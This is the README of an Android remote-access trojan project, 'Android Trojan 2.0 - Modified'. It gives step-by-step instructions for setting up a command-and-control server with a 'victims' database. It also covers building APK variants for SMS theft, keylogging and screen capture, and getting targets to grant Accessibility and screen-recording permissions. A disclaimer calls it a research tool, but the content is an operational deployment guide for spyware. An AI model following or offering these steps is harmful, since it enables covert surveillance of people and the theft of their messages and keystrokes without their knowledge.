Professional Command & Control Framework for Android Devices
Features โข Installation โข Usage โข Screenshots โข Disclaimer
Android Trojan 2.0 - Modified is a sophisticated Command & Control (C2) framework designed for security research and penetration testing. It features a modern web-based dashboard with real-time device monitoring, customizable APK generation, and multi-device management capabilities.
Original Repository: shivamsuyal/Android-Trojan-2.0
- Node.js >= 14.0.0
- npm >= 6.0.0
- Android Studio or Gradle
- JDK 8 or higher
- Android SDK (API 21+)
- Android 5.0 (Lollipop) or higher
- Internet connection
git clone https://github.com/Android-App-Security/Android-Trojan-2.0-Modified.git
cd Android-Trojan-2.0-ModifiedThis project uses Supabase for authentication and device tracking.
- Go to Supabase
- Create a new account (free tier is sufficient)
- Create a new project
- In your Supabase project dashboard, go to Settings โ API
- Copy your Project URL (looks like:
https://xxxxx.supabase.co) - Copy your anon/public API key
- In Supabase, go to SQL Editor
- Run the following SQL commands:
-- Victims Table (stores connected device information)
CREATE TABLE public.victims (
"ID" character varying NOT NULL,
"Country" character varying NULL,
"ISP" character varying NULL,
"IP" character varying NULL,
"Brand" character varying NULL,
"Model" character varying NULL,
"Manufacture" character varying NULL,
CONSTRAINT victims_pkey PRIMARY KEY ("ID")
) TABLESPACE pg_default;
-- Active User Table (stores login credentials)
CREATE TABLE public.activeuser (
id BIGSERIAL PRIMARY KEY,
username character varying NULL,
password character varying NULL,
name character varying NULL
) TABLESPACE pg_default;- In Supabase, go to Table Editor
- Select the
activeusertable - Click Insert โ Insert row
- Add your credentials:
- username:
admin(or your preferred username) - password:
password123(or your preferred password) - name:
Administrator(or your name)
- username:
- Click Save
Note: Passwords are stored in plain text for simplicity. For production use, implement proper password hashing.
Create a .env file in the project root:
# Supabase Configuration
SUPERBASE_URL=https://your-project.supabase.co
SUPERBASE_KEY=your-anon-public-key-here
# Server Ports
PORT=4001
BOT_PORT=4000Replace your-project.supabase.co and your-anon-public-key-here with your actual Supabase credentials.
npm installYou can either use pre-built APKs or build them yourself:
cd mobile
./gradlew assembleSmsRelease assembleKeyloggerRelease assembleScreenRelease assembleSmsKeyloggerRelease assembleSmsScreenRelease assembleKeyloggerScreenRelease assembleFullRelease
cd ..
./sign-apks.shThis will create signed APKs in the output/ directory.
./build-all-apks.sh
./sign-apks.shNote: Building APKs requires Android SDK and Gradle to be installed.
npm startThe server will start on:
- Bot Network:
http://0.0.0.0:4000 - Master Network:
http://0.0.0.0:4001
- Navigate to
http://localhost:4001/login - Login with your credentials (configured in Supabase)
- Access the dashboard at
http://localhost:4001/dashboard
Multi-device management dashboard with HTB theme, real-time device monitoring, and comprehensive control panels.
Interactive popup modal for screen monitoring - background remains accessible while viewing live screen feed.
- Ensure debug keystore is properly configured
- Check Android version compatibility (API 21+)
- Enable "Install from Unknown Sources"
- Verify server IP is correct
- Check firewall settings
- Ensure both devices are on the same network
- Restart the server and reinstall APK
- Grant all requested permissions
- Enable Accessibility Service (for keylogger/screen variants)
- Allow screen recording (for screen variants)
This project is for educational and research purposes only. The authors are not responsible for any misuse or damage caused by this program.
IMPORTANT: This tool is designed for security research, penetration testing, and educational purposes only. Unauthorized access to devices is illegal and unethical.
- โ Legal Use: Authorized penetration testing, security research, educational purposes
- โ Illegal Use: Unauthorized surveillance, data theft, malicious activities
By using this software, you agree to use it responsibly and in compliance with all applicable laws.
Made with โค๏ธ for Security Research
โญ Star this repo if you find it useful!

